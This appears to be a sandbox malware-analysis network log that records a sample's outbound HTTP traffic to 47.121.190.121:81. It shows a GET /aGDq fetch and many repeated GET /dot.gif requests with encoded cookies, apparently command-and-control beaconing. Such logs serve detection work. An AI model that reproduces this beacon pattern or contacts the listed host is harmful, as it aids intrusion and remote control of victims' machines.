Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50190 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50190
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 50212 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50212
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50216

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 47.121.190.121:81

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd

Source: global traffic	HTTP traffic detected: GET /aGDq HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
